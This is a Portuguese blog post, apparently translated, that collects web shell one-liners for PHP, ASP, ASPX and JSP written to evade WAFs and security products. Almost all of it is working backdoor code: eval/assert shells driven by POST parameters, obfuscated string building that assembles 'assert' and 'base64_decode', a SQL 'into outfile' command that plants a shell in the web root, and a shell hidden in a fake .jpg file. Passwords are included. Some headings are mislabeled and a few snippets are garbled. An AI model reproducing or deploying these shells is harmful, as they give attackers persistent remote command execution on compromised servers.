Coleção de Shell One-Liners em ASPX para Evade de Segurança

PHP

Shell One-Liner Comum

Série PHP

Shell One-Liner para Evade de Firewall

Variações do PHP para Evade

PHP v9 - Obtenção de Shell em Versões Superiores

ASP

Shell One-Liner ASP para Evade do Security Dog

ASPX

Shell One-Liner ASPX

Transformação de Shell One-Liner em Shell de Duas Linhas

Métodos de Evasão de Detecção (Evasion)


// Shel one-liner para execução de comandos

</div>#### Shell One-Liner Comum

<div class="code-example">```
<?php eval($_POST['pwd123']); ?>
<?php @eval($_POST['pwd123']); ?>

</div>#### Shell One-Liner para Evade de Firewall (WAF)

<div class="code-example">```
select '<?php @eval($_POST[cmd]);?>' into outfile 'C:/Inetpub/wwwroot/mysql-php/1.php'

<?php $_=""; $_["A"]++; $_=$_.""; $___=$_["A"];
$____=$___; $____++;
// ... (montagem complexa de strings para formar "base64_decode" e "assert")
$_=$____.$___.$_________.$_______.'6'.'4'.'_'.$______.$_______.$_____.$________.$______.$_______;
 $__=$___.$_________.$_________.$_______.$________.$_____;
 $__($_("ZXZhbCgkX1BPU1RbMV0p")); ?>

<?php $_REQUEST['a']($_REQUEST['b']); ?>

<?php $t=$_GET['t']; $tt=$_GET['tt'];
$s = $t . $tt;
$s($_REQUEST['cc123']); ?>

// Exemplo de construção dinâmica para evasão


</div><div class="code-example">```
// Variação para Evade
<?php
if($_POST['x']!='') {
    $dec = "base64_decode";
    eval( $dec($_POST['z0']) );
}
?> Senha: x

// Shell em ASP com sintaxe mista (para confusão)
<% a=request("pass") %><%eval a %>

// Shell com quebra de linhas e espaços para evasão
<?php
eval
($_POST
['a'])
?>

<?php
$a = range(1,200);
$b = chr($a[96]).chr($a[114]).chr($a[114]).chr($a[100]).chr($a[113]).chr($a[115]); // Monta "assert"
$b( ${ chr($a[94]).chr($a[79]).chr($a[78]).chr($a[82]).chr($a[83]) }[ chr($a[51]) ] ); // Executa com $_POST[4]
?> Senha: 4

Shell One-Liner ASP Comum

<%Y=request("input")%> <%execute(Y)%>

// Shell com construção de string para a função eval <%eval (eval(chr(114)+chr(101)+chr(113)+chr(117)+chr(101)+chr(115)+chr(116))("input"))%>

// Shell com ofuscação - Senha: -7 <%eval""&( "e" & "v" & "a" & "l" & "(" & "r" & "e" & "q" & "u" & "e" & "s" & "t" & "(" & "0" & "-" & "2" & "-" & "5" & ")" & ")" )%>


</div>#### Shell One-Liner ASP para Evade do Security Dog

<div class="code-example">```
// Senha (pass)
<% %>

// Shell simples com variável
<% a=request("zl") %><%eval a %>

Shell One-Liner ASPX (Evade)

<%@ Page Language="Jscript" %> <%eval(Request.Item["input"],"unsafe");%>

// Shell com validação de request desativada <%@ Page Language="Jscript" validateRequest="false" %> <%Response.Write(eval(Request.Item["w"],"unsafe"));%>


</div>**JSP**

<div class="code-example">```
// Shell para evasão de sensores
<% E=request("1") %> abc 123456789 <%execute E%>

// Utilizando a tag de script do servidor para evitar os símbolos <%%>
<script language="VBScript" runat=server>
execute request("cmd")
</script>

A ideia é aumentar a ocultação. A forma original:

Métodos de Evasão de Detecção (Evasion)

Método 1: Deformação de Código

Em vez de usar diretamente uma função suspeita, armazene-a em uma variável.

Escreva o código malicioso em um arquivo com extensão não suspeita (ex: .jpg) e inclua-o no ASP alvo usando uma tag HTML de inclusão de arquivo.

// No conteúdo de "imagem.jpg" (texto puro, não uma imagem real) <% execute(request("payload")) %>


</div>**Shell com Suporte a Conexão de Ferramentas como "Ca Dao" (Variante):**

<div class="code-example">```
<?php
$mujj = $_POST['z'];
if ($mujj != "") {
    $xsser = base64_decode($_POST['z0']);
    @eval("\$safedg = $xsser;");
}
?>
// Senha: z

Tags: ASP PHP ASPX jsp Web Shell

Publicado em 7-8 02:30